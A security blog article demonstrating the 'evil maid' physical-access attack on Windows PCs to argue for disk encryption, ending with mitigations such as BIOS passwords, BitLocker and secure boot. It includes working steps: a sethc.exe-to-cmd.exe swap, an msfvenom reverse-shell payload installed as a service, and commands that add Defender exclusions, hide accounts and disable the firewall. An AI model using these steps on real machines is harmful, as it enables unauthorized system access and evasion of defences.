Evil Maid – Encrypt your harddrive

The problem

Many companies/people are very aware of their online security. They install firewalls, AV, IDS, not running as local admin and in general behaving cautiously on the internet. All this is very good, but most people and corporations seems to forget about physical security.

Without physical security all of the above precautions are pretty much useless. In most cases all it takes to compromise a PC is a couple of minutes of physical access. As I am going to show you in this article, it can even be carried out by a non-technical person. That’s why the attack is called the evil-maid attack.

Most companies don’t encrypt their PC’s. Some they encrypt their laptops, but most fail encrypting their office workstations. I would claim that in 90% of companies it would be easy to obtain 5 minutes of physical access to a corporate machine using very basic social engineering skills. Most companies let’s in a lot of third parties like cleaning staff, service technicians, carpenters etc.

In the end of the article I will discuss different kinds of mitigations.

A couple of proof of concept attacks

In both of the following examples I boot up a USB stick and run a couple of commands. This is only for demonstrating what is going on. A real attacker would of course make it start up automatically thereby making it easy to use for a real maid in a miniskirt.

Example 1

I created a small USB stick based on Tiny Core Linux. On this stick I installed the tools needed to access the files and the registry on a windows NTFS partition. Here is a screen recording of a windows PC that I don’t have credentials for.

I boot the stick and run a small script that replaces “c:\windows\system32\sethc.exe” with windows own “cmd.exe” file.

After booting back into windows I can now press the left shift button 5 times to start a command prompt. Windows thinks it starts the sticky keys app, but instead it gives me a prompt where I have “NT AUTHORITY\SYSTEM” rights. From here on I create an extra admin user.

Example 2

In the next example I set up a meterpreter handler on a Kali box to accept reverse tcp connections on port 8888. Now I boot the USB stick on the target machine and run a script the copies my meterpreter payload to the target and via the registry it also creates a service.

When the windows machine is booted it automatically creates a meterpreter session back to my Kali box. Again I am “NT AUTHORITY\SYSTEM” and just for fun I take a screenshot of the target machine.

It slides completely under the “Windows Defender” radar, because the service is loaded before the AV.

Why bother?

Many will say that they don’t have secret documents on their PC. But with this USB stick pretty much anyone can perform this attack. Once the bad guys are inside your machine with a meterpreter-session pretty much anything is possible: Man in the middle attacks, keyboard logging, screen dumping, listening in on the microphone or webcam.

Don’t be the lowest hanging fruit on the tree… Just encrypt you PC! Also the ones that never leaves the office.

How to try it yourself

The USB stick was created with Tiny Core Linux.

  1. I first downloaded the Core Plus image.
  2. Mounted it in a VM together with an empty USB stick.
  3. Used tc-install tool to create a USB-HDD, Whole-disk stick. I chose to install the “Core Only” version which doesn’t provide a GUI.

After booting the stick I installed the tools needed:

tce-load -wi chntpw bash kmaps ntfs-3g git

Then I edited the APPEND line in “/mnt/sda1/boot/extlinux/extlinux.conf” in order to have my local keyboard installed. I also wanted to make my /home and /opt directories persistent. Do a copy paste of your detected UUID’s.

APPEND quiet multivt vga=791 kmap=qwerty/dk waitusb=5:UUID="xxx" tce=UUID="xxx" home=UUID="xxx" opt=UUID="xxx"

Finally you need my scripts from github. It can be installed like this:

git clone https://github.com/x821938/Evil-Maid-POC.git

The last thing to do is to create a meterpreter payload on you Kali Box and transfer it to the “meterpreter-service” directory on the USB stick. I used this command to create my payload:

msfvenom -p windows/meterpreter/reverse_tcp -f exe-service LPORT="8888" LHOST="10.0.2.15" PrependMigrate=true > meterpreter_service.exe

Now you can just follow the videos to replicate my proof of concept.

After getting the foothold.

Because we are have SYSTEM rights, one of the first things we would do is making an exclusion for the Windows Defender Antivirus:

Add-MpPreference -ExclusionPath "C:\Temp" # Where we want to do malicious stuff...

Or maybe hide our added users from the login screen:

$path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
New-Item $path -Force | New-ItemProperty -Name Username -Value 0 -PropertyType DWord -Force

Or maybe turn off the firewall…. Or create some custom rules for our malicious files.

netsh advfirewall set allprofiles state off
New-NetFirewallRule -DisplayName "My Rule" -Direction Inbound -Program "c:\temp\bad.exe" -Action Allow

Mitigations

There are many ways of making life harder for the bad guys. Here are some of them.

Changing the boot order.

This will keep a hotel cleaning maid in miniskirt from just booting your laptop on a USB stick. But any tech savvy kid can modify the BIOS settings in a few seconds.

Changing the boot order and set a BIOS password.

Now the attack will take a little longer and requires a screwdriver. In 10 minutes it should be possible to transfer the hard-drive to another machine and do the same trick.

Enable drive-lock / HD-password in BIOS

In order to get access to the hard-drive a password needs to be provided at boot time. It’s a little inconvenient for the user, but it actually makes it quite harder to perform this attack. The main problem is that there are some tools out there to circumvent this protection in some cases. All the data on the drives platters are still unencrypted. Technically skilled people will be able to get data out of the drive or maybe alter them. The disk still needs the password to unlock, even if it’s moved to another machine.

Whole-drive encryption

If you have Windows 10 Pro or Enterprise edition you can just enable Bitlocker on your system drive. Only a very small part of the OS is unencrypted. It would require a quite sophisticated attack to add code that will survive all the way until windows is booted. It’s not impossible, but very hard.

If you only have the Windows Home edition you can use the free Veracrypt. There has been reports of hackers modifying the Veracrypt bootloader, but it’s not an easy task.

Whole-drive encryption and BIOS secure boot

By enabling secure boot and making sure it’s enabled in windows together with bitlocker is probably the best thing you can do. The secure boot makes sure that nobody can tinker with your bootloader. The bootloader and the drivers’ digital signatures are checked on boot. They will not be loaded if the are tampered with.

Now we are not talking about evil maids anymore but probably evil feds instead!

Lock your door and never leave the room

For some people this is also a solution. Arguably the most secure but maybe not the best, depending on your personality.

Conclusion

Just do something! It’s a minimal effort, it’s free and it makes you sleep a little better at night.

2 thoughts to “Evil Maid – Encrypt your harddrive”

  1. I read your article on how to perform an evil maid attack and am writing to inquire on how you were able to include your script (the one that changed sethc to cmd) within Tiny Core’s operating system files so that you were able to load them during boot up.

    1. There are many ways… just a couple of them are:
      Install the ftp package on tiny and fetch it remotely
      Use wget on tiny core to fetch them from a webserver
      Mount the tiny core usbstick from another linux (in VM or physical machine) and copy.

Leave a Reply

Your email address will not be published. Required fields are marked *